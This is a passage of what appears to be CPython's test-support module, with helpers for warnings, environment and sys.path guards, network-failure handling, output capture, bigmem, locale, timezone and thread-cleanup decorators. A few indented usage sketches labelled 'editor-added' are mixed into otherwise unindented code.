opener = urllib.request.build_opener()
if gzip:
opener.addheaders.append(('Accept-Encoding', 'gzip'))
f = opener.open(url, timeout=15)
if gzip and f.headers.get('Content-Encoding') == 'gzip':
f = gzip.GzipFile(fileobj=f)
try:
with open(fn, "wb") as out:
s = f.read()
while s:
out.write(s)
s = f.read()
finally:
f.close()
f = check_valid_file(fn)
if f is not None:
return f
raise TestFailed('invalid resource %r' % fn)
class WarningsRecorder(object):
"""Convenience wrapper for the warnings list returned on
entry to the warnings.catch_warnings() context manager.
"""
def __init__(self, warnings_list):
self._warnings = warnings_list
self._last = 0
def __getattr__(self, attr):
if len(self._warnings) > self._last:
return getattr(self._warnings[-1], attr)
elif attr in warnings.WarningMessage._WARNING_DETAILS:
return None
raise AttributeError("%r has no attribute %r" % (self, attr))
@property
def warnings(self):
return self._warnings[self._last:]
def reset(self):
self._last = len(self._warnings)
@contextlib.contextmanager
def _filterwarnings(filters, quiet=False):
"""Catch the warnings, then check if all the expected
warnings have been raised and re-raise unexpected warnings.
If 'quiet' is True, only re-raise the unexpected warnings.
"""
# Clear the warning registry of the calling module
# in order to re-raise the warnings.
frame = sys._getframe(2)
registry = frame.f_globals.get('__warningregistry__')
if registry:
registry.clear()
with warnings.catch_warnings(record=True) as w:
# Set filter "always" to record all warnings. Because
# test_warnings swap the module, we need to look up in
# the sys.modules dictionary.
sys.modules['warnings'].simplefilter("always")
yield WarningsRecorder(w)
# Filter the recorded warnings
reraise = list(w)
missing = []
for msg, cat in filters:
seen = False
for w in reraise[:]:
warning = w.message
# Filter out the matching messages
if (re.match(msg, str(warning), re.I) and
issubclass(warning.__class__, cat)):
seen = True
reraise.remove(w)
if not seen and not quiet:
# This filter caught nothing
missing.append((msg, cat.__name__))
if reraise:
raise AssertionError("unhandled warning %s" % reraise[0])
if missing:
raise AssertionError("filter (%r, %s) did not catch any warning" %
missing[0])
def check_warnings(*filters, **kwargs):
"""Context manager to silence warnings.
Accept 2-tuples as positional arguments:
("message regexp", WarningCategory)
Optional argument:
- if 'quiet' is True, it does not fail if a filter catches nothing
(default True without argument,
default False if some filters are defined)
Without argument, it defaults to:
check_warnings(("", Warning), quiet=True)
"""
quiet = kwargs.get('quiet')
if not filters:
filters = (("", Warning),)
# Preserve backward compatibility
if quiet is None:
quiet = True
return _filterwarnings(filters, quiet)
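# Illustrative sketch (editor-added): check_warnings() both silences and verifies
# warnings.  Because a filter is given, quiet defaults to False and the block fails
# if the expected DeprecationWarning is never emitted.
class _ExampleCheckWarningsTest(unittest.TestCase):
    def test_expected_deprecation(self):
        with check_warnings(('.*obsolete.*', DeprecationWarning)):
            warnings.warn('this API is obsolete', DeprecationWarning)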
@contextlib.contextmanager
def check_no_warnings(testcase, message='', category=Warning, force_gc=False):
"""Context manager to check that no warnings are emitted.
This context manager enables a given warning within its scope
and checks that no warnings are emitted even with that warning
enabled.
If force_gc is True, a garbage collection is attempted before checking
for warnings. This may help to catch warnings emitted when objects
are deleted, such as ResourceWarning.
Other keyword arguments are passed to warnings.filterwarnings().
"""
with warnings.catch_warnings(record=True) as warns:
warnings.filterwarnings('always',
message=message,
category=category)
yield
if force_gc:
gc_collect()
testcase.assertEqual(warns, [])
@contextlib.contextmanager
def check_no_resource_warning(testcase):
"""Context manager to check that no ResourceWarning is emitted.
Usage:
with check_no_resource_warning(self):
f = open(...)
...
del f
You must remove the object which may emit ResourceWarning before
the end of the context manager.
"""
with check_no_warnings(testcase, category=ResourceWarning, force_gc=True):
yield
class CleanImport(object):
"""Context manager to force import to return a new module reference.
This is useful for testing module-level behaviours, such as
the emission of a DeprecationWarning on import.
Use like this:
with CleanImport("foo"):
importlib.import_module("foo") # new reference
"""
def __init__(self, *module_names):
self.original_modules = sys.modules.copy()
for module_name in module_names:
if module_name in sys.modules:
module = sys.modules[module_name]
# It is possible that module_name is just an alias for
# another module (e.g. stub for modules renamed in 3.x).
                # In that case, we also need to delete the real module to clear
# the import cache.
if module.__name__ != module_name:
del sys.modules[module.__name__]
del sys.modules[module_name]
def __enter__(self):
return self
def __exit__(self, *ignore_exc):
sys.modules.update(self.original_modules)
class EnvironmentVarGuard(collections.abc.MutableMapping):
"""Class to help protect the environment variable properly. Can be used as
a context manager."""
def __init__(self):
self._environ = os.environ
self._changed = {}
def __getitem__(self, envvar):
return self._environ[envvar]
def __setitem__(self, envvar, value):
# Remember the initial value on the first access
if envvar not in self._changed:
self._changed[envvar] = self._environ.get(envvar)
self._environ[envvar] = value
def __delitem__(self, envvar):
# Remember the initial value on the first access
if envvar not in self._changed:
self._changed[envvar] = self._environ.get(envvar)
if envvar in self._environ:
del self._environ[envvar]
def keys(self):
return self._environ.keys()
def __iter__(self):
return iter(self._environ)
def __len__(self):
return len(self._environ)
def set(self, envvar, value):
self[envvar] = value
def unset(self, envvar):
del self[envvar]
def __enter__(self):
return self
def __exit__(self, *ignore_exc):
for (k, v) in self._changed.items():
if v is None:
if k in self._environ:
del self._environ[k]
else:
self._environ[k] = v
os.environ = self._environ
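# Illustrative sketch (editor-added): EnvironmentVarGuard records the first change to
# each variable and restores os.environ when the block exits.
def _example_environ_guard_usage():
    with EnvironmentVarGuard() as env:
        env['PYTHONDONTWRITEBYTECODE'] = '1'   # set (or overwrite) for the block
        env.unset('PYTHONPATH')                # removal is undone on exit too
        assert os.environ['PYTHONDONTWRITEBYTECODE'] == '1'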
class DirsOnSysPath(object):
"""Context manager to temporarily add directories to sys.path.
This makes a copy of sys.path, appends any directories given
as positional arguments, then reverts sys.path to the copied
settings when the context ends.
Note that *all* sys.path modifications in the body of the
context manager, including replacement of the object,
will be reverted at the end of the block.
"""
def __init__(self, *paths):
self.original_value = sys.path[:]
self.original_object = sys.path
sys.path.extend(paths)
def __enter__(self):
return self
def __exit__(self, *ignore_exc):
sys.path = self.original_object
sys.path[:] = self.original_value
class TransientResource(object):
"""Raise ResourceDenied if an exception is raised while the context manager
is in effect that matches the specified exception and attributes."""
def __init__(self, exc, **kwargs):
self.exc = exc
self.attrs = kwargs
def __enter__(self):
return self
def __exit__(self, type_=None, value=None, traceback=None):
"""If type_ is a subclass of self.exc and value has attributes matching
self.attrs, raise ResourceDenied. Otherwise let the exception
propagate (if any)."""
if type_ is not None and issubclass(self.exc, type_):
for attr, attr_value in self.attrs.items():
if not hasattr(value, attr):
break
if getattr(value, attr) != attr_value:
break
else:
raise ResourceDenied("an optional resource is not available")
# Context managers that raise ResourceDenied when various issues
# with the Internet connection manifest themselves as exceptions.
# XXX deprecate these and use transient_internet() instead
time_out = TransientResource(OSError, errno=errno.ETIMEDOUT)
socket_peer_reset = TransientResource(OSError, errno=errno.ECONNRESET)
ioerror_peer_reset = TransientResource(OSError, errno=errno.ECONNRESET)
@contextlib.contextmanager
def transient_internet(resource_name, *, timeout=30.0, errnos=()):
"""Return a context manager that raises ResourceDenied when various issues
with the Internet connection manifest themselves as exceptions."""
default_errnos = [
('ECONNREFUSED', 111),
('ECONNRESET', 104),
('EHOSTUNREACH', 113),
('ENETUNREACH', 101),
('ETIMEDOUT', 110),
# socket.create_connection() fails randomly with
# EADDRNOTAVAIL on Travis CI.
('EADDRNOTAVAIL', 99),
]
default_gai_errnos = [
('EAI_AGAIN', -3),
('EAI_FAIL', -4),
('EAI_NONAME', -2),
('EAI_NODATA', -5),
# Encountered when trying to resolve IPv6-only hostnames
('WSANO_DATA', 11004),
]
denied = ResourceDenied("Resource %r is not available" % resource_name)
captured_errnos = errnos
gai_errnos = []
if not captured_errnos:
captured_errnos = [getattr(errno, name, num)
for (name, num) in default_errnos]
gai_errnos = [getattr(socket, name, num)
for (name, num) in default_gai_errnos]
def filter_error(err):
n = getattr(err, 'errno', None)
if (isinstance(err, socket.timeout) or
(isinstance(err, socket.gaierror) and n in gai_errnos) or
(isinstance(err, urllib.error.HTTPError) and
500 <= err.code <= 599) or
(isinstance(err, urllib.error.URLError) and
(("ConnectionRefusedError" in err.reason) or
("TimeoutError" in err.reason) or
("EOFError" in err.reason))) or
n in captured_errnos):
if not verbose:
sys.stderr.write(denied.args[0] + "\n")
raise denied from err
old_timeout = socket.getdefaulttimeout()
try:
if timeout is not None:
socket.setdefaulttimeout(timeout)
yield
except nntplib.NNTPTemporaryError as err:
if verbose:
sys.stderr.write(denied.args[0] + "\n")
raise denied from err
except OSError as err:
# urllib can wrap original socket errors multiple times (!), we must
# unwrap to get at the original error.
while True:
a = err.args
if len(a) >= 1 and isinstance(a[0], OSError):
err = a[0]
# The error can also be wrapped as args[1]:
# except socket.error as msg:
# raise OSError('socket error', msg).with_traceback(sys.exc_info()[2])
elif len(a) >= 2 and isinstance(a[1], OSError):
err = a[1]
else:
break
filter_error(err)
raise
# XXX should we catch generic exceptions and look for their
# __cause__ or __context__?
finally:
socket.setdefaulttimeout(old_timeout)
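# Illustrative sketch (editor-added): wrap network traffic so that flaky-connection
# errors surface as ResourceDenied (i.e. a skip) rather than a failure.  The host
# name is only an example.
def _example_transient_internet_usage():
    import urllib.request
    with transient_internet('www.example.com', timeout=10.0):
        urllib.request.urlopen('http://www.example.com/', timeout=10.0).close()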
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
import io
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, io.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\\n")
"""
return captured_output("stderr")
def captured_stdin():
"""Capture the input to sys.stdin:
with captured_stdin() as stdin:
stdin.write('hello\\n')
stdin.seek(0)
# call test code that consumes from sys.stdin
captured = input()
self.assertEqual(captured, "hello")
"""
return captured_output("stdin")
def gc_collect():
"""Force as many objects as possible to be collected.
In non-CPython implementations of Python, this is needed because timely
deallocation is not guaranteed by the garbage collector. (Even in CPython
this can be the case in case of reference cycles.) This means that __del__
methods may be called later than expected and weakrefs may remain alive for
longer than expected. This function tries its best to force all garbage
objects to disappear.
"""
gc.collect()
if is_jython:
time.sleep(0.1)
gc.collect()
gc.collect()
@contextlib.contextmanager
def disable_gc():
have_gc = gc.isenabled()
gc.disable()
try:
yield
finally:
if have_gc:
gc.enable()
def python_is_optimized():
"""Find if Python was built with optimizations."""
cflags = sysconfig.get_config_var('PY_CFLAGS') or ''
final_opt = ""
for opt in cflags.split():
if opt.startswith('-O'):
final_opt = opt
return final_opt not in ('', '-O0', '-Og')
_header = 'nP'
_align = '0n'
if hasattr(sys, "gettotalrefcount"):
_header = '2P' + _header
_align = '0P'
_vheader = _header + 'n'
def calcobjsize(fmt):
return struct.calcsize(_header + fmt + _align)
def calcvobjsize(fmt):
return struct.calcsize(_vheader + fmt + _align)
_TPFLAGS_HAVE_GC = 1<<14
_TPFLAGS_HEAPTYPE = 1<<9
def check_sizeof(test, o, size):
import _testcapi
result = sys.getsizeof(o)
# add GC header size
if ((type(o) == type) and (o.__flags__ & _TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & _TPFLAGS_HAVE_GC))):
size += _testcapi.SIZEOF_PYGC_HEAD
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
test.assertEqual(result, size, msg)
#=======================================================================
# Decorator for running a function in a different locale, correctly resetting
# it afterwards.
def run_with_locale(catstr, *locales):
def decorator(func):
def inner(*args, **kwds):
try:
import locale
category = getattr(locale, catstr)
orig_locale = locale.setlocale(category)
except AttributeError:
# if the test author gives us an invalid category string
raise
except:
# cannot retrieve original locale, so do nothing
locale = orig_locale = None
else:
for loc in locales:
try:
locale.setlocale(category, loc)
break
except:
pass
# now run the function, resetting the locale on exceptions
try:
return func(*args, **kwds)
finally:
if locale and orig_locale:
locale.setlocale(category, orig_locale)
inner.__name__ = func.__name__
inner.__doc__ = func.__doc__
return inner
return decorator
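# Illustrative sketch (editor-added): run a function under the first locale that the
# platform accepts; '' falls back to the user's default, and the original locale is
# restored afterwards.  The locale names are examples and may not exist everywhere.
@run_with_locale('LC_NUMERIC', 'fr_FR.UTF-8', 'de_DE.UTF-8', '')
def _example_locale_decimal_point():
    import locale
    return locale.localeconv()['decimal_point']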
#=======================================================================
# Decorator for running a function in a specific timezone, correctly
# resetting it afterwards.
def run_with_tz(tz):
def decorator(func):
def inner(*args, **kwds):
try:
tzset = time.tzset
except AttributeError:
raise unittest.SkipTest("tzset required")
if 'TZ' in os.environ:
orig_tz = os.environ['TZ']
else:
orig_tz = None
os.environ['TZ'] = tz
tzset()
# now run the function, resetting the tz on exceptions
try:
return func(*args, **kwds)
finally:
if orig_tz is None:
del os.environ['TZ']
else:
os.environ['TZ'] = orig_tz
time.tzset()
inner.__name__ = func.__name__
inner.__doc__ = func.__doc__
return inner
return decorator
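# Illustrative sketch (editor-added): force TZ to UTC for one function; the decorator
# raises unittest.SkipTest on platforms without time.tzset() (e.g. Windows).
@run_with_tz('UTC')
def _example_utc_timestamps():
    return time.gmtime().tm_hour == time.localtime().tm_hour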
#=======================================================================
# Big-memory-test support. Separate from 'resources' because memory use
# should be configurable.
# Some handy shorthands. Note that these are used for byte-limits as well
# as size-limits, in the various bigmem tests
_1M = 1024*1024
_1G = 1024 * _1M
_2G = 2 * _1G
_4G = 4 * _1G
MAX_Py_ssize_t = sys.maxsize
def set_memlimit(limit):
global max_memuse
global real_max_memuse
sizes = {
'k': 1024,
'm': _1M,
'g': _1G,
't': 1024*_1G,
}
m = re.match(r'(\d+(\.\d+)?) (K|M|G|T)b?$', limit,
re.IGNORECASE | re.VERBOSE)
if m is None:
raise ValueError('Invalid memory limit %r' % (limit,))
memlimit = int(float(m.group(1)) * sizes[m.group(3).lower()])
real_max_memuse = memlimit
if memlimit > MAX_Py_ssize_t:
memlimit = MAX_Py_ssize_t
if memlimit < _2G - 1:
raise ValueError('Memory limit %r too low to be useful' % (limit,))
max_memuse = memlimit
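# Illustrative sketch (editor-added): set_memlimit() accepts strings such as '2.5G';
# anything below 2 GiB is rejected as too low to be useful for bigmem tests.
def _example_set_memlimit_usage():
    set_memlimit('2.5G')
    assert real_max_memuse == int(2.5 * 1024 ** 3)
    assert max_memuse <= sys.maxsize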
class _MemoryWatchdog:
"""An object which periodically watches the process' memory consumption
and prints it out.
"""
def __init__(self):
self.procfile = '/proc/{pid}/statm'.format(pid=os.getpid())
self.started = False
def start(self):
try:
f = open(self.procfile, 'r')
except OSError as e:
warnings.warn('/proc not available for stats: {}'.format(e),
RuntimeWarning)
sys.stderr.flush()
return
watchdog_script = findfile("memory_watchdog.py")
self.mem_watchdog = subprocess.Popen([sys.executable, watchdog_script],
stdin=f, stderr=subprocess.DEVNULL)
f.close()
self.started = True
def stop(self):
if self.started:
self.mem_watchdog.terminate()
self.mem_watchdog.wait()
def bigmemtest(size, memuse, dry_run=True):
"""Decorator for bigmem tests.
'size' is a requested size for the test (in arbitrary, test-interpreted
units.) 'memuse' is the number of bytes per unit for the test, or a good
estimate of it. For example, a test that needs two byte buffers, of 4 GiB
each, could be decorated with @bigmemtest(size=_4G, memuse=2).
The 'size' argument is normally passed to the decorated test method as an
extra argument. If 'dry_run' is true, the value passed to the test method
may be less than the requested value. If 'dry_run' is false, it means the
test doesn't support dummy runs when -M is not specified.
"""
def decorator(f):
def wrapper(self):
size = wrapper.size
memuse = wrapper.memuse
if not real_max_memuse:
maxsize = 5147
else:
maxsize = size
if ((real_max_memuse or not dry_run)
and real_max_memuse < maxsize * memuse):
raise unittest.SkipTest(
"not enough memory: %.1fG minimum needed"
% (size * memuse / (1024 ** 3)))
if real_max_memuse and verbose:
print()
print(" ... expected peak memory use: {peak:.1f}G"
.format(peak=size * memuse / (1024 ** 3)))
watchdog = _MemoryWatchdog()
watchdog.start()
else:
watchdog = None
try:
return f(self, maxsize)
finally:
if watchdog:
watchdog.stop()
wrapper.size = size
wrapper.memuse = memuse
return wrapper
return decorator
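# Illustrative sketch (editor-added): a bigmem test.  memuse=1 is a rough per-unit
# estimate for the bytes object; without -M the decorator passes a small dummy size
# instead of the requested _2G.
class _ExampleBigMemTest(unittest.TestCase):
    @bigmemtest(size=_2G, memuse=1)
    def test_large_bytes(self, size):
        data = b'x' * size
        self.assertEqual(len(data), size)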
def bigaddrspacetest(f):
"""Decorator for tests that fill the address space."""
def wrapper(self):
if max_memuse < MAX_Py_ssize_t:
if MAX_Py_ssize_t >= 2**63 - 1 and max_memuse >= 2**31:
raise unittest.SkipTest(
"not enough memory: try a 32-bit build instead")
else:
raise unittest.SkipTest(
"not enough memory: %.1fG minimum needed"
% (MAX_Py_ssize_t / (1024 ** 3)))
else:
return f(self)
return wrapper
#=======================================================================
# unittest integration.
class BasicTestRunner:
def run(self, test):
result = unittest.TestResult()
test(result)
return result
def _id(obj):
return obj
def requires_resource(resource):
if resource == 'gui' and not _is_gui_available():
return unittest.skip(_is_gui_available.reason)
if is_resource_enabled(resource):
return _id
else:
return unittest.skip("resource {0!r} is not enabled".format(resource))
def cpython_only(test):
"""
Decorator for tests only applicable on CPython.
"""
return impl_detail(cpython=True)(test)
def impl_detail(msg=None, **guards):
if check_impl_detail(**guards):
return _id
if msg is None:
guardnames, default = _parse_guards(guards)
if default:
msg = "implementation detail not available on {0}"
else:
msg = "implementation detail specific to {0}"
guardnames = sorted(guardnames.keys())
msg = msg.format(' or '.join(guardnames))
return unittest.skip(msg)
def _parse_guards(guards):
# Returns a tuple ({platform_name: run_me}, default_value)
if not guards:
return ({'cpython': True}, False)
is_true = list(guards.values())[0]
assert list(guards.values()) == [is_true] * len(guards) # all True or all False
return (guards, not is_true)
# Use the following check to guard CPython's implementation-specific tests --
# or to run them only on the implementation(s) guarded by the arguments.
def check_impl_detail(**guards):
"""This function returns True or False depending on the host platform.
Examples:
if check_impl_detail(): # only on CPython (default)
if check_impl_detail(jython=True): # only on Jython
if check_impl_detail(cpython=False): # everywhere except on CPython
"""
guards, default = _parse_guards(guards)
return guards.get(platform.python_implementation().lower(), default)
def no_tracing(func):
"""Decorator to temporarily turn off tracing for the duration of a test."""
if not hasattr(sys, 'gettrace'):
return func
else:
@functools.wraps(func)
def wrapper(*args, **kwargs):
original_trace = sys.gettrace()
try:
sys.settrace(None)
return func(*args, **kwargs)
finally:
sys.settrace(original_trace)
return wrapper
def refcount_test(test):
"""Decorator for tests which involve reference counting.
    To start, the decorator does not run the test if it is not run by CPython.
After that, any trace function is unset during the test to prevent
unexpected refcounts caused by the trace function.
"""
return no_tracing(cpython_only(test))
def _filter_suite(suite, pred):
"""Recursively filter test cases in a suite based on a predicate."""
newtests = []
for test in suite._tests:
if isinstance(test, unittest.TestSuite):
_filter_suite(test, pred)
newtests.append(test)
else:
if pred(test):
newtests.append(test)
suite._tests = newtests
def _run_suite(suite):
"""Run tests from a unittest.TestSuite-derived class."""
runner = get_test_runner(sys.stdout,
verbosity=verbose,
capture_output=(junit_xml_list is not None))
result = runner.run(suite)
if junit_xml_list is not None:
junit_xml_list.append(result.get_xml_element())
if not result.wasSuccessful():
if len(result.errors) == 1 and not result.failures:
err = result.errors[0][1]
elif len(result.failures) == 1 and not result.errors:
err = result.failures[0][1]
else:
err = "multiple errors occurred"
if not verbose: err += "; run in verbose mode for details"
raise TestFailed(err)
# By default, don't filter tests
_match_test_func = None
_match_test_patterns = None
def match_test(test):
# Function used by support.run_unittest() and regrtest --list-cases
if _match_test_func is None:
return True
else:
return _match_test_func(test.id())
def _is_full_match_test(pattern):
# If a pattern contains at least one dot, it's considered
# as a full test identifier.
# Example: 'test.test_os.FileTests.test_access'.
#
# Reject patterns which contain fnmatch patterns: '*', '?', '[...]'
# or '[!...]'. For example, reject 'test_access*'.
return ('.' in pattern) and (not re.search(r'[?*\[\]]', pattern))
def set_match_tests(patterns):
global _match_test_func, _match_test_patterns
if patterns == _match_test_patterns:
# No change: no need to recompile patterns.
return
if not patterns:
func = None
# set_match_tests(None) behaves as set_match_tests(())
patterns = ()
elif all(map(_is_full_match_test, patterns)):
# Simple case: all patterns are full test identifier.
# The test.bisect utility only uses such full test identifiers.
func = set(patterns).__contains__
else:
regex = '|'.join(map(fnmatch.translate, patterns))
# The search *is* case sensitive on purpose:
# don't use flags=re.IGNORECASE
regex_match = re.compile(regex).match
def match_test_regex(test_id):
if regex_match(test_id):
# The regex matches the whole identifier, for example
# 'test.test_os.FileTests.test_access'.
return True
else:
# Try to match parts of the test identifier.
# For example, split 'test.test_os.FileTests.test_access'
# into: 'test', 'test_os', 'FileTests' and 'test_access'.
return any(map(regex_match, test_id.split(".")))
func = match_test_regex
# Create a copy since patterns can be mutable and so modified later
_match_test_patterns = tuple(patterns)
_match_test_func = func
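# Illustrative sketch (editor-added): pattern handling in set_match_tests().  A bare
# name is an fnmatch pattern and may match any dotted component; a full dotted
# identifier without wildcards is matched by exact membership.
def _example_set_match_tests_usage():
    set_match_tests(['FileTests'])
    assert _match_test_func('test.test_os.FileTests.test_access')
    set_match_tests(['test.test_os.FileTests.test_access'])
    assert _match_test_func('test.test_os.FileTests.test_access')
    set_match_tests(None)   # reset: everything matches again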
def run_unittest(*classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
_filter_suite(suite, match_test)
_run_suite(suite)
#=======================================================================
# Check for the presence of docstrings.
# Rather than trying to enumerate all the cases where docstrings may be
# disabled, we just check for that directly
def _check_docstrings():
"""Just used to check if docstrings are enabled"""
MISSING_C_DOCSTRINGS = (check_impl_detail() and
sys.platform != 'win32' and
not sysconfig.get_config_var('WITH_DOC_STRINGS'))
HAVE_DOCSTRINGS = (_check_docstrings.__doc__ is not None and
not MISSING_C_DOCSTRINGS)
requires_docstrings = unittest.skipUnless(HAVE_DOCSTRINGS,
"test requires docstrings")
#=======================================================================
# doctest driver.
def run_doctest(module, verbosity=None, optionflags=0):
"""Run doctest on the given module. Return (#failures, #tests).
If optional argument verbosity is not specified (or is None), pass
support's belief about verbosity on to doctest. Else doctest's
usual behavior is used (it searches sys.argv for -v).
"""
import doctest
if verbosity is None:
verbosity = verbose
else:
verbosity = None
f, t = doctest.testmod(module, verbose=verbosity, optionflags=optionflags)
if f:
raise TestFailed("%d of %d doctests failed" % (f, t))
if verbose:
print('doctest (%s) ... %d tests with zero failures' %
(module.__name__, t))
return f, t
#=======================================================================
# Support for saving and restoring the imported modules.
def modules_setup():
return sys.modules.copy(),
def modules_cleanup(oldmodules):
# Encoders/decoders are registered permanently within the internal
# codec cache. If we destroy the corresponding modules their
# globals will be set to None which will trip up the cached functions.
encodings = [(k, v) for k, v in sys.modules.items()
if k.startswith('encodings.')]
sys.modules.clear()
sys.modules.update(encodings)
# XXX: This kind of problem can affect more than just encodings. In particular
# extension modules (such as _ssl) don't cope with reloading properly.
# Really, test modules should be cleaning out the test specific modules they
# know they added (ala test_runpy) rather than relying on this function (as
# test_importhooks and test_pkg do currently).
# Implicitly imported *real* modules should be left alone (see issue 10556).
sys.modules.update(oldmodules)
#=======================================================================
# Threading support to prevent reporting refleaks when running regrtest.py -R
# Flag used by saved_test_environment of test.libregrtest.save_env,
# to check if a test modified the environment. The flag should be set to False
# before running a new test.
#
# For example, threading_cleanup() sets the flag if the function fails
# to clean up threads.
environment_altered = False
# NOTE: we use thread._count() rather than threading.enumerate() (or the
# moral equivalent thereof) because a threading.Thread object is still alive
# until its __bootstrap() method has returned, even after it has been
# unregistered from the threading module.
# thread._count(), on the other hand, only gets decremented *after* the
# __bootstrap() method has returned, which gives us reliable reference counts
# at the end of a test run.
def threading_setup():
return _thread._count(), threading._dangling.copy()
def threading_cleanup(*original_values):
global environment_altered
_MAX_COUNT = 100
for count in range(_MAX_COUNT):
values = _thread._count(), threading._dangling
if values == original_values:
break
if not count:
# Display a warning at the first iteration
environment_altered = True
dangling_threads = values[1]
print("Warning -- threading_cleanup() failed to cleanup "
"%s threads (count: %s, dangling: %s)"
% (values[0] - original_values[0],
values[0], len(dangling_threads)),
file=sys.stderr)
for thread in dangling_threads:
print(f"Dangling thread: {thread!r}", file=sys.stderr)
sys.stderr.flush()
# Don't hold references to threads
dangling_threads = None
values = None
time.sleep(0.01)
gc_collect()
def reap_threads(func):
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
"""
@functools.wraps(func)
def decorator(*args):
key = threading_setup()
try:
return func(*args)
finally:
threading_cleanup(*key)
return decorator
@contextlib.contextmanager
def wait_threads_exit(timeout=60.0):
"""
bpo-31234: Context manager to wait until all threads created in the with
statement exit.
Use _thread.count() to check if threads exited. Indirectly, wait until
threads exit the internal t_bootstrap() C function of the _thread module.
threading_setup() and threading_cleanup() are designed to emit a warning
if a test leaves running threads in the background. This context manager
    is designed to clean up threads started by _thread.start_new_thread(),
    which provides no way to wait for thread exit, whereas threading.Thread
    has a join() method.
"""
old_count = _thread._count()
try:
yield
finally:
start_time = time.monotonic()
deadline = start_time + timeout
while True:
count = _thread._count()
if count <= old_count:
break
if time.monotonic() > deadline:
dt = time.monotonic() - start_time
msg = (f"wait_threads() failed to cleanup {count - old_count} "
f"threads after {dt:.1f} seconds "
f"(count: {count}, old count: {old_count})")
raise AssertionError(msg)
time.sleep(0.010)
gc_collect()
def join_thread(thread, timeout=30.0):
"""Join a thread. Raise an AssertionError if the thread is still alive
after timeout seconds.
"""
thread.join(timeout)
if thread.is_alive():
msg = f"failed to join the thread in {timeout:.1f} seconds"
raise AssertionError(msg)
def reap_children():
"""Use this function at the end of test_main() whenever sub-processes
are started. This will help ensure that no extra children (zombies)
stick around to hog resources and create problems when looking
for refleaks.
"""
global environment_altered
# Need os.waitpid(-1, os.WNOHANG): Windows is not supported
if not (hasattr(os, 'waitpid') and hasattr(os, 'WNOHANG')):
return
# Reap all our dead child processes so we don't leave zombies around.
# These hog resources and might be causing some of the buildbots to die.
while True:
try:
# Read the exit status of any child process which already completed
pid, status = os.waitpid(-1, os.WNOHANG)
except OSError:
break
if pid == 0:
break
print("Warning -- reap_children() reaped child process %s"
% pid, file=sys.stderr)
environment_altered = True
@contextlib.contextmanager
def start_threads(threads, unlock=None):
threads = list(threads)
started = []
try:
try:
for t in threads:
t.start()
started.append(t)
except:
if verbose:
print("Can't start %d threads, only %d threads started" %
(len(threads), len(started)))
raise
yield
finally:
try:
if unlock:
unlock()
endtime = starttime = time.time()
for timeout in range(1, 16):
endtime += 60
for t in started:
t.join(max(endtime - time.time(), 0.01))
started = [t for t in started if t.isAlive()]
if not started:
break
if verbose:
print('Unable to join %d threads during a period of '
'%d minutes' % (len(started), timeout))
finally:
started = [t for t in started if t.isAlive()]
if started:
faulthandler.dump_traceback(sys.stdout)
raise AssertionError('Unable to join %d threads' % len(started))
@contextlib.contextmanager
def swap_attr(obj, attr, new_val):
"""Temporary swap out an attribute with a new object.
Usage:
with swap_attr(obj, "attr", 5):
...
This will set obj.attr to 5 for the duration of the with: block,
restoring the old value at the end of the block. If `attr` doesn't
exist on `obj`, it will be created and then deleted at the end of the
block.
The old value (or None if it doesn't exist) will be assigned to the
target of the "as" clause, if there is one.
"""
if hasattr(obj, attr):
real_val = getattr(obj, attr)
setattr(obj, attr, new_val)
try:
yield real_val
finally:
setattr(obj, attr, real_val)
else:
setattr(obj, attr, new_val)
try:
yield
finally:
if hasattr(obj, attr):
delattr(obj, attr)
@contextlib.contextmanager
def swap_item(obj, item, new_val):
"""Temporary swap out an item with a new object.
Usage:
with swap_item(obj, "item", 5):
...
This will set obj["item"] to 5 for the duration of the with: block,
restoring the old value at the end of the block. If `item` doesn't
exist on `obj`, it will be created and then deleted at the end of the
block.
The old value (or None if it doesn't exist) will be assigned to the
target of the "as" clause, if there is one.
"""
if item in obj:
real_val = obj[item]
obj[item] = new_val
try:
yield real_val
finally:
obj[item] = real_val
else:
obj[item] = new_val
try:
yield
finally:
if item in obj:
del obj[item]
def strip_python_stderr(stderr):
"""Strip the stderr of a Python process from potential debug output
emitted by the interpreter.
This will typically be run on the result of the communicate() method
of a subprocess.Popen object.
"""
stderr = re.sub(br"\[\d+ refs, \d+ blocks\]\r?\n?", b"", stderr).strip()
return stderr
requires_type_collecting = unittest.skipIf(hasattr(sys, 'getcounts'),
'types are immortal if COUNT_ALLOCS is defined')
def args_from_interpreter_flags():
"""Return a list of command-line arguments reproducing the current
settings in sys.flags and sys.warnoptions."""
return subprocess._args_from_interpreter_flags()
def optim_args_from_interpreter_flags():
"""Return a list of command-line arguments reproducing the current
optimization settings in sys.flags."""
return subprocess._optim_args_from_interpreter_flags()
#============================================================
# Support for assertions about logging.
#============================================================
class TestHandler(logging.handlers.BufferingHandler):
def __init__(self, matcher):
# BufferingHandler takes a "capacity" argument
# so as to know when to flush. As we're overriding
# shouldFlush anyway, we can set a capacity of zero.
# You can call flush() manually to clear out the
# buffer.
logging.handlers.BufferingHandler.__init__(self, 0)
self.matcher = matcher
def shouldFlush(self):
return False
def emit(self, record):
self.format(record)
self.buffer.append(record.__dict__)
def matches(self, **kwargs):
"""
Look for a saved dict whose keys/values match the supplied arguments.
"""
result = False
for d in self.buffer:
if self.matcher.matches(d, **kwargs):
result = True
break
return result
class Matcher(object):
_partial_matches = ('msg', 'message')
def matches(self, d, **kwargs):
"""
Try to match a single dict with the supplied arguments.
Keys whose values are strings and which are in self._partial_matches
